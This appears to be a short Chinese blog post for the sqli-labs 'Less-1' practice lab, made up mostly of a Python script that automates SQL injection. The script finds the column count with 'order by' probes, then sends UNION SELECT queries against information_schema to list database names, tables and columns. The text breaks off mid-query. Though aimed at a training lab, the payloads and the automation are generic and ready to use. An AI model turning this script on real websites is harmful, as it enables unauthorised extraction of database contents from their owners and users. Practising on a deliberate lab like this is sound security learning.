虽然这个很简单,但是还是写个脚本跑一下
Less-1
from http.client import PROCESSING, responses
from re import I, T
from typing import FrozenSet
from bs4.dammit import xml_encoding
from bs4.element import ProcessingInstruction
import requests
import urllib.request
from colorama import init, Fore, Back, Style
from requests.api import get
import bs4
import lxml
# payload = 'abcdefghijklmnopqrstuvwxyz~!@#$%^&*()<>?|,./`'
'''打开网页'''
def send_request(url):
res = urllib.request.urlopen(url+ '--+')
result = str(res.read().decode('utf-8'))
# print(result) 打印源码
return result
'''order by 查看注入点'''
def order_by_N(url):
flag = 0
for i in range(1,101):
# print(i)
sql = url + 'order by ' +str(i) + '--+'
# print(i)
result = requests.get(sql)
# result1= send_request( url + 'order by ' +str(i) + '--+')
# print(result) 打印200 状态码
# print(sql) 打印SQL语句
soup = bs4.BeautifulSoup(result.content,'lxml')
# print(soup.prettify())
content = soup.find(size = '3')
# print(str(content.text))
a='Login' in str(content.text)
# print(a)
if a == True:
flag = i
print(i)
elif a == False:
break
print("检测到注入点"+str(i-1))
return flag
'''获得数据库名称'''
def get_database(sql_url):
sql_database=sql_url+'union select 1,2,group_concat(schema_name) from information_schema.schemata --+'
print("[正在执行SQL语句:]"+sql_database)
result = requests.get(sql_database)
soup = bs4.BeautifulSoup(result.content,'lxml')
content = soup.find(size = '5')
print("爆破结果如下:"+content.text)
# 打印出来了 数据库
'''爆破数据库'''
def get_table(sql_url):
I = input("请输入想要注入的数据库:")
sql_table = sql_url+ " union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = '%s' --+" %I
print("[正在执行SQL语句:]"+sql_table)
result = requests.get(sql_table)
soup = bs4.BeautifulSoup(result.content,'lxml')
content = soup.find(size = '5')
print("爆破结果如下:"+content.text)
# 打印出来 表的列表
# '''爆破数据库的表'''
# def get_column(sql_url):
J = input("请输入想要查看到表:")
sql_column= sql_url+ "union select 1,2,group_concat(column_nam